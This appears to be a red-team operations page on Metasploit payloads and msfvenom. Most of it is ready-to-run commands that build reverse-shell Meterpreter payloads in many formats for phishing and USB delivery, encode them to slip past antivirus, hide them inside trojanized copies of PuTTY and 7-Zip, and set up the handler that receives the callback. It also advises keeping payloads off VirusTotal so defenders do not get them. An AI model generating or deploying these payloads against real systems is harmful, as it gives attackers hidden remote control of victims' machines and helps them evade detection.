Skip to main content

Payloads & msfvenom


Payload Taxonomy​

Staged vs Stageless​

TypeNaming ConventionHow it WorksWhen to Use
Stagedwindows/x64/meterpreter/reverse_httpsSmall stager connects back, downloads full Meterpreter stage from handlerSmaller file size required
Stagelesswindows/x64/meterpreter_reverse_httpsFull Meterpreter embedded in the payload - no second connectionPreferred - fewer network events, no stage download visible

The single / before reverse = staged. The _ = stageless. Default to stageless.

Payload Types​

CategoryExampleNotes
Singleswindows/x64/execSelf-contained, executes one action, no C2
Stagerswindows/x64/meterpreter/reverse_httpsConnects back to download stage
Stageswindows/x64/meterpreterFull feature shell, delivered by stager
Stagelesswindows/x64/meterpreter_reverse_httpsFull Meterpreter in one blob

For CTE: use meterpreter_reverse_https (stageless) for most scenarios.


Common Payloads​

PayloadUse Case
windows/x64/meterpreter_reverse_httpsWindows 64-bit, primary choice
windows/meterpreter_reverse_httpsWindows 32-bit (legacy targets)
linux/x64/meterpreter_reverse_tcpLinux 64-bit
linux/x86/meterpreter_reverse_tcpLinux 32-bit
osx/x64/meterpreter_reverse_httpsmacOS
windows/x64/shell_reverse_tcpDumb shell - no Meterpreter, useful if MSF stage is blocked

msfvenom​

msfvenom generates standalone payload files outside of msfconsole. Use it to produce executables, scripts, and documents for delivery via phishing, USB drops, or HTTP serving.

Syntax​

msfvenom -p <PAYLOAD> [OPTIONS] -f <FORMAT> -o <OUTPUT_FILE>

Essential Options​

FlagDescription
-pPayload
LHOST=Callback IP (your Kali)
LPORT=Callback port
-fOutput format (see below)
-oOutput file path
-eEncoder
-iEncoder iterations
-xCustom PE template (embed in existing executable)
-kKeep template functionality (run original + payload)
-aArchitecture (x64, x86)
--platformTarget platform (windows, linux, osx)
-bBad characters to avoid (e.g., '\x00\x0a\x0d')
--smallestGenerate smallest possible payload

Output Formats​

Windows Executables​

# Standalone EXE (64-bit, stageless HTTPS)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f exe -o payload.exe

# 32-bit EXE
msfvenom -p windows/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f exe -o payload_x86.exe

# DLL
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f dll -o payload.dll

# Service EXE (for SCM-based execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f exe-service -o svc_payload.exe

Scripts​

# PowerShell (no file - base64 encoded command for in-line execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f ps1 -o payload.ps1

# VBScript
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f vbs -o payload.vbs

# HTA (HTML Application - good for phishing)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f hta-psh -o payload.hta

# JavaScript (for browser/WSH-based execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f js_le -o payload.js

Linux / Other​

# ELF binary (Linux)
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<KALI_IP> LPORT=4444 -f elf -o payload.elf

# Python
msfvenom -p python/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f raw -o payload.py

Raw Shellcode (for injection)​

# C array
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f c

# Raw binary
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f raw -o shellcode.bin

Encoders​

Encoders transform the payload bytes to avoid static signatures. They are not a reliable AV bypass on their own - modern AV does not rely solely on byte signatures. Use encoders as one layer among several (see 08_obfuscation_and_evasion.md).

# List available encoders
msfvenom -l encoders

# Apply an encoder
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -e x64/xor_dynamic -i 5 -f exe -o payload.exe

Encoder Reference​

EncoderArchitectureNotes
x64/xor_dynamicx64Good x64 choice - randomized XOR key
x64/zutto_dekirux64Robust x64 encoder
x86/shikata_ga_naix86Polymorphic, widely known - heavily signatured, avoid for evasion
x86/xor_dynamicx86Better x86 choice over shikata
x86/countdownx86Simple, low detection rate

Multiple iterations (-i) re-encode the payload repeatedly. More iterations = slightly better obfuscation, significantly larger file.

# 8 iterations with xor_dynamic
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -e x64/xor_dynamic -i 8 -f exe -o payload.exe

Custom PE Templates​

Embedding a payload inside an existing legitimate executable makes the resulting file look like the original application in file metadata and imports. The embedded payload runs alongside (or instead of) the original.

# Embed payload inside a legitimate binary (-x = template, -k = keep original behavior)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 \
-x /opt/templates/putty.exe -k \
-f exe -o putty_trojanized.exe

# Without -k: original binary is replaced (payload only, no original execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 \
-x /opt/templates/7zFM.exe \
-f exe -o 7zip_payload.exe
Template Compatibility

Not all executables work as templates. 64-bit payloads require 64-bit templates; 32-bit payloads require 32-bit templates. If the resulting binary crashes or doesn't execute, try a different template binary.

Template Sources

Use common sysadmin tools as templates - PuTTY, 7-Zip, Sysinternals utilities. These are expected on endpoints, have known-good file hashes from the vendor, and are likely already whitelisted.


Setting Up the Handler​

Every payload needs a listener. Always run the handler before delivering the payload.

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST <KALI_IP>
msf6 > set LPORT 443
msf6 > set ExitOnSession false # Keep handler running after first connection
msf6 > exploit -j # Run as background job

Handler Options Worth Knowing​

OptionValuePurpose
ExitOnSessionfalseKeep listening after first session connects
SessionCommunicationTimeout300Seconds before idle session is killed (default 300)
SessionExpirationTimeout00 = never expire sessions
LHOST<KALI_IP>Must match what the payload was built with
LPORT443Must match payload

Verifying a Payload Before Delivery​

# Check file type
file payload.exe

# Check detected architecture
objdump -f payload.exe | grep architecture

# Test against VirusTotal alternative (local, no upload)
clamscan payload.exe # ClamAV - low bar, but catches obvious sigs

# String check - confirm LHOST/LPORT are not visible in plaintext
strings payload.exe | grep -i "10\.\|192\.\|443"
Never VirusTotal

Do not upload payloads to VirusTotal or any online scanner before a mission. VT shares samples with AV vendors - your payload will be signatured within hours.